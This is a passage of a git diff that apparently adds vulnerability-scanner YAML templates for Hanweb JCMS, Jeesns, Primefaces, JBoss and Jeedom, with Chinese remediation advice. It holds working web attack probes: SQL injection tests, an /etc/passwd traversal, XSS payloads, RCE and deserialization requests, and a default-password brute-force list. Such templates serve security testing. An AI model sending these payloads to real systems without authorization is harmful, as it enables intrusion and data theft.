1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - status_code_1==200 && status_code_2==200 && body_1!=body_2 + matchers-condition: and + path: + - '{{BaseURL}}/vc/vc/interface/styletop/coltop_interface.jsp?i_id={{rand_int(1,10)}}%20and%201=1' + - '{{BaseURL}}/vc/vc/interface/styletop/coltop_interface.jsp?i_id={{rand_int(1,10)}}%20and%201=2' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Columncount_Downfile_JSP-FileInclude.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Columncount_Downfile_JSP-FileInclude.yaml" new file mode 100755 index 000000000..d2a8879a2 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Columncount_Downfile_JSP-FileInclude.yaml" @@ -0,0 +1,31 @@ +id: VC-Columncount_Downfile_JSP-FileInclude +info: + name: 大汉网络任意文件读取漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS任意文件读取漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在任意文件读取漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"root") && contains(body,"bash") + matchers-condition: and + path: + - '{{BaseURL}}/vc/vc/columncount/downfile.jsp?savename=a.txt&filename=../../../../../../../../etc/passwd' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Interface_Styletop_Arttop_interface_JSP-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Interface_Styletop_Arttop_interface_JSP-SQLi.yaml" new file mode 100755 index 000000000..b2528806f --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Interface_Styletop_Arttop_interface_JSP-SQLi.yaml" @@ -0,0 +1,39 @@ +id: VC-Interface_Styletop_Arttop_interface_JSP-SQLi +info: + name: 大汉VC /vc/vc/interface/styletop/arttop_interface.jsp 注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS arttop_interface.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - body_1!=body_2 + matchers-condition: and + path: + - '{{BaseURL}}/vc/vc/interface/styletop/arttop_interface.jsp?i_id={{rand_int(1, + 10)}}%20and%201=1' + - '{{BaseURL}}/vc/vc/interface/styletop/arttop_interface.jsp?i_id={{rand_int(1, + 10)}}%20and%201=2' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Que_Style_Coltop_JSP-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Que_Style_Coltop_JSP-SQLi.yaml" new file mode 100755 index 000000000..ef5c7f64a --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Que_Style_Coltop_JSP-SQLi.yaml" @@ -0,0 +1,37 @@ +id: VC-Que_Style_Coltop_JSP-SQLi +info: + name: 大汉 VC que_style_coltop.jsp SQL注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS que_style_coltop.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - body_1!=body_2 + matchers-condition: and + path: + - '{{BaseURL}}/vc/vc/interface/index/que_style_coltop.jsp?webid={{rand_int(1,10)}}%20and%201=1' + - '{{BaseURL}}/vc/vc/interface/index/que_style_coltop.jsp?webid={{rand_int(1,10)}}%20and%201=2' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-VerifyCodeServlet-Unauth.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-VerifyCodeServlet-Unauth.yaml" new file mode 100755 index 000000000..6eb3ee4d5 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-VerifyCodeServlet-Unauth.yaml" @@ -0,0 +1,46 @@ +id: VC-VerifyCodeServlet-Unauth +info: + name: 大汉全系统VerifyCodeServlet导致越权检测 + author: + - l0ne1y + description: |- + 大汉全系统VerifyCodeServlet导致后台绕过漏洞 + 大汉软件是一家电子政务领域专注于“互联网+政务服务”及“数字政府”建设的软件开发商和技术服务商。 + + + 大汉jcms,jact,jsearch,vipchat,vc,xxgk等存在管理后台权限绕过漏洞。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: word + condition: and + words: + - Licence文件 + - 应用环境配置 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/vipchat/setup/opr_licenceinfo.jsp' + - '{{BaseURL}}/jcms/setup/opr_licenceinfo.jsp' + - '{{BaseURL}}/jsearch/setup/opr_licenceinfo.jsp' + - '{{BaseURL}}/jact/setup/opr_licenceinfo.jsp' + - '{{BaseURL}}/vc/setup/opr_licenceinfo.jsp' + - '{{BaseURL}}/xxgk/setup/opr_licenceinfo.jsp' + - '{{BaseURL}}/vipchat/setup/setup/admin.jsp' + - '{{BaseURL}}/jcms/setup/setup/admin.jsp' + - '{{BaseURL}}/jsearch/setup/setup/admin.jsp' + - '{{BaseURL}}/jact/setup/setup/admin.jsp' + - '{{BaseURL}}/vc/setup/setup/admin.jsp' + - '{{BaseURL}}/xxgk/setup/setup/admin.jsp' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-opr_copycode_jsp-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-opr_copycode_jsp-SQLi.yaml" new file mode 100755 index 000000000..08b586289 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-opr_copycode_jsp-SQLi.yaml" @@ -0,0 +1,35 @@ +id: VC-opr_copycode_jsp-SQLi +info: + name: 大汉SQL注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS opr_copycode.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - status_code_1==200 && status_code_2==500 && body_1!=body_2 + matchers-condition: and + path: + - '{{BaseURL}}/vc/vc/style/opr_copycode.jsp?id=-1%20or%201%3D1' + - '{{BaseURL}}/vc/vc/style/opr_copycode.jsp?id=-1%20or%201%3D2' + method: GET diff --git a/config/51pwn/yaml/JEESNS/CVE-2020-19282.yaml b/config/51pwn/yaml/JEESNS/CVE-2020-19282.yaml new file mode 100755 index 000000000..a885f1708 --- /dev/null +++ b/config/51pwn/yaml/JEESNS/CVE-2020-19282.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-19282 +info: + name: Jeesns 1.4.2 XSS + author: + - l0ne1y + description: |- + Jeesns 跨站脚本漏洞 + Jeesns 是福州凌夕网络科技公司的一款基于JAVA企业级平台研发的社交管理系统。依托企业级JAVA的高效、安全、稳定等优势,开创国内JAVA版开源SNS先河。数据库使用MYSQL,全部源代码开放。 + + Jeesns 1.4.2存在跨站脚本漏洞,该漏洞允许攻击者通过系统错误消息文本字段中精心设计的有效负载执行任意 Web 脚本或 HTML。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/zchuanzhao/jeesns + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/JEESNS/CVE-2020-19283.yaml b/config/51pwn/yaml/JEESNS/CVE-2020-19283.yaml new file mode 100755 index 000000000..33dae2c09 --- /dev/null +++ b/config/51pwn/yaml/JEESNS/CVE-2020-19283.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-19283 +info: + name: Jeesns newVersion Reflection XSS + author: + - l0ne1y + description: |- + Jeesns 跨站脚本漏洞 + Jeesns是福州凌夕网络科技公司的一款基于JAVA企业级平台研发的社交管理系统。依托企业级JAVA的高效、安全、稳定等优势,开创国内JAVA版开源SNS先河。数据库使用MYSQL,全部源代码开放。 + + Jeesns 1.4.2 的 /newVersion 组件中存在安全漏洞,该漏洞允许攻击者执行任意 Web 脚本或 HTML。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/zchuanzhao/jeesns + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/JEESNS/CVE-2020-19295.yaml b/config/51pwn/yaml/JEESNS/CVE-2020-19295.yaml new file mode 100755 index 000000000..3657f0719 --- /dev/null +++ b/config/51pwn/yaml/JEESNS/CVE-2020-19295.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-19295 +info: + name: Jeesns Weibo Topic Reflection XSS + author: + - l0ne1y + description: |- + Jeesns 跨站脚本漏洞 + Jeesns是福州凌夕网络科技公司的一款基于JAVA企业级平台研发的社交管理系统。依托企业级JAVA的高效、安全、稳定等优势,开创国内JAVA版开源SNS先河。数据库使用MYSQL,全部源代码开放。 + + Jeesns 1.4.2存在安全漏洞,该漏洞允许攻击者可利用该漏洞执行任意的web脚本或HTML。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/zchuanzhao/jeesns + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/Java EE/CVE-2017-1000486.yaml b/config/51pwn/yaml/Java EE/CVE-2017-1000486.yaml new file mode 100755 index 000000000..35785bb9b --- /dev/null +++ b/config/51pwn/yaml/Java EE/CVE-2017-1000486.yaml @@ -0,0 +1,34 @@ +id: CVE-2017-1000486 +info: + name: Primetek Primefaces 5.x - Remote Code Execution + author: + - l0ne1y + description: |- + Primetek Primefaces远程代码执行漏洞 + Primetek Primefaces是一个开源的使用在Java EE系统中的UI库。 + + Primetek Primefaces 5.x版本中存在加密问题漏洞。远程攻击者可利用该漏洞执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/primefaces/primefaces/issues/1152 + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: header + words: + - 'Mogwailabs: CHECKCHECK' + raw: + - | + POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip, deflate + + pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D diff --git a/config/51pwn/yaml/Jboss/CVE-2010-1871.yaml b/config/51pwn/yaml/Jboss/CVE-2010-1871.yaml new file mode 100755 index 000000000..57a5b5505 --- /dev/null +++ b/config/51pwn/yaml/Jboss/CVE-2010-1871.yaml @@ -0,0 +1,28 @@ +id: CVE-2010-1871 +info: + name: JBoss Seam参数化EL表达式远程代码执行漏洞 + author: + - l0ne1y + description: |- + JBoss seam2模板注入漏洞 + JBoss Seam 2 (jboss-seam2),用于 Red Hat Linux 的 JBoss 企业应用平台 4.3.0,没有正确清理 JBoss 表达式语言 (EL) 表达式的输入,这允许远程攻击者通过精心设计的 URL 执行任意代码. 注意:这只是 Java 安全管理器未正确配置时的漏洞。 + severity: critical + remediation: |- + 1.官方修复方案: + 建议用户到官方获取最新补丁或者最新版本程序,补丁获取链接: + https://jbossweb.jboss.org/ +requests: +- matchers: + - type: word + part: header + words: + - '{{rand}}' + - type: status + status: + - 302 + matchers-condition: and + path: + - '{{BaseURL}}/admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{rand}}%7d' + method: GET +variables: + rand: '{{rand_int(80000000,100000000)}}' diff --git a/config/51pwn/yaml/Jboss/CVE-2017-12149.yaml b/config/51pwn/yaml/Jboss/CVE-2017-12149.yaml new file mode 100755 index 000000000..04cbb395d --- /dev/null +++ b/config/51pwn/yaml/Jboss/CVE-2017-12149.yaml @@ -0,0 +1,40 @@ +id: CVE-2017-12149 +info: + name: Jboss Application Server - Remote Code Execution + author: + - l0ne1y + description: |- + JBoss AS 6.X 反序列化漏洞 + 该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权 + severity: critical + remediation: |- + 官方修复方案: + 1、建议升级到JBOSS AS7,补丁获取链接: + https://jbossweb.jboss.org/ + 临时修复方案: + 1、 不需要 http-invoker.sar 组件的用户可直接删除此组件 + 2、 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中:/*用于对 http invoker 组件进行访问控制。 +requests: +- matchers: + - type: word + part: body + words: + - ClassCastException + - type: word + part: header + words: + - application/x-java-serialized-object + matchers-condition: and + raw: + - | + POST /invoker/JMXInvokerServlet/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} + - | + POST /invoker/EJBInvokerServlet/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} diff --git a/config/51pwn/yaml/Jboss/jboss-seam-debug-page.yaml b/config/51pwn/yaml/Jboss/jboss-seam-debug-page.yaml new file mode 100755 index 000000000..6934d2cd8 --- /dev/null +++ b/config/51pwn/yaml/Jboss/jboss-seam-debug-page.yaml @@ -0,0 +1,35 @@ +id: jboss-seam-debug-page +info: + name: Jboss Seam Debug Page Enabled + author: + - l0ne1y + description: | + 启用Jboss Seam调试页面 + 安全配置错误可以发生在一个应用程序堆栈的任何层面,包括网络服务,平台,web服务器、应用服务器、数据库、框架、自定义的代码、预安装的虚拟机、容器、存储等。 + 这通常是由于不安全的默认配置、不完整的临时配置、开源云存储、错误的HTTP 标头配置以及包含敏感信息的详细错误信息所造成的。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://jbossweb.jboss.org/ + 临时修复方案: + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 +requests: +- matchers: + - type: word + condition: and + words: + - SeamDebugPage + - org.jboss.seam + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/debug.seam' + method: GET diff --git a/config/51pwn/yaml/Jboss/jboss-web-console.yaml b/config/51pwn/yaml/Jboss/jboss-web-console.yaml new file mode 100755 index 000000000..8333db7f7 --- /dev/null +++ b/config/51pwn/yaml/Jboss/jboss-web-console.yaml @@ -0,0 +1,30 @@ +id: jboss-web-console +info: + name: JBoss Management Console Server Information + author: + - l0ne1y + description: |- + JBoss管理控制台服务器信息泄露漏洞 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://jbossweb.jboss.org/ + 临时修复方案: + 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 + 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: word + condition: and + words: + - Application Server + - Management Console + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/web-console/ServerInfo.jsp' + method: GET diff --git a/config/51pwn/yaml/Jboss/jmx-console.yaml b/config/51pwn/yaml/Jboss/jmx-console.yaml new file mode 100755 index 000000000..d3797848b --- /dev/null +++ b/config/51pwn/yaml/Jboss/jmx-console.yaml @@ -0,0 +1,24 @@ +id: jmx-console +info: + name: JMX Console + author: + - l0ne1y + description: |- + JBoss jmx-console控制台未授权访问漏洞 + JBoss不仅提供了线程内存的信息,还有一些MBean会对Jboss系统产生影响,默认情况下, JBoss启动后可以通过访问 http://localhost:8080/jmx-console 浏览jboss的部署管理的一些信息以及一些自定义的JMX服务,不需要输入用户名和密码,那么有心人知道服务器的IP和端口后就可以访问Jboss的Jmx-console通过Mbean攻击服务器,影响服务器运行甚至宕机 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://jbossweb.jboss.org/ + 临时修复方案: + 1、启用密码管理,修改jboss-4.2.3.GA\\server\default\deploy\jmx-console.war\WEB-INF\jboss-web.xml,不再注释security-domain节点 + 2、设置密码,修改jboss-4.2.3.GA\server\default\conf\props\jmx-console-roles.properties设置用户角色,修改jboss-4.2.3.GA\server\default\conf\props\jmx-console-users.properties设置用户密码,该文件定义的格式为:用户名=角色,多个角色以“,”隔开 ,系统默认定义了用户名和密码都是 admin的用户, 可以通过修改添加新用户,例如添加一个用户user,登录密码为123456 +requests: +- matchers: + - type: word + words: + - JBoss JMX Management Console + path: + - '{{BaseURL}}/jmx-console/' + method: GET diff --git a/config/51pwn/yaml/Jboss/jmx-default-login.yaml b/config/51pwn/yaml/Jboss/jmx-default-login.yaml new file mode 100755 index 000000000..1606682d9 --- /dev/null +++ b/config/51pwn/yaml/Jboss/jmx-default-login.yaml @@ -0,0 +1,44 @@ +id: jmx-default-login +info: + name: JBoss JMX Console Weak Credential Discovery + author: + - l0ne1y + description: |- + JBoss JMX控制台弱口令 + 弱口令(weak password)通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。 + 弱口令指的是仅包含简单数字和字母的口令,例如“123456”、“abc123”等,因为这样的口令很容易被别人破解,从而可以直接导致攻击者入侵服务器或控制应用程序。 + 弱口令通常无处不在,在网络设备、安全设备、服务器、OA系统等处均可能存在弱口令,该漏洞特点是覆盖面广、利用门槛低、造成危害大。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://jbossweb.jboss.org/ + 临时修复方案: + 1、设置复杂密码,修改jboss-4.2.3.GA\server\default\conf\props\jmx-console-roles.properties设置用户角色,修改jboss-4.2.3.GA\server\default\conf\props\jmx-console-users.properties设置用户密码,该文件定义的格式为:用户名=角色,多个角色以“,”隔开 ,系统默认定义了用户名和密码都是 admin的用户, 可以通过修改添加新用户,例如添加一个用户user,登录密码为123456 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + words: + - JMImplementation + matchers-condition: and + raw: + - | + GET /jmx-console/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(user + ':' + pass)}} + attack: clusterbomb + payloads: + pass: + - admin + - 12345 + - 123456 + - 1234 + - 1.23456789e+08 + - 123qwe + - root + user: + - admin + - root diff --git a/config/51pwn/yaml/Jeedom/CVE-2020-9036.yaml b/config/51pwn/yaml/Jeedom/CVE-2020-9036.yaml new file mode 100755 index 000000000..baf7f0a90 --- /dev/null +++ b/config/51pwn/yaml/Jeedom/CVE-2020-9036.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-9036 +info: + name: Jeedom through 4.0.38 allows XSS + author: + - pikpikcu + tags: + - cve + - cve2020 + - xss + - jeedom + description: |- + Jeedom 跨站脚本漏洞 + Jeedom是一套用于物联网的开源家庭自动化解决方案。 + + Jeedom 4.0.38及之前版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + reference: + - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ + - https://nvd.nist.gov/vuln/detail/cve-2020-9036 + severity: medium + classification: + cve-id: + - cve-2020-9036 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/jeedom/core/commit/fafe84cb9bbd491a931748e7b4fe7d2851877a33 + + 临时修复方案: + 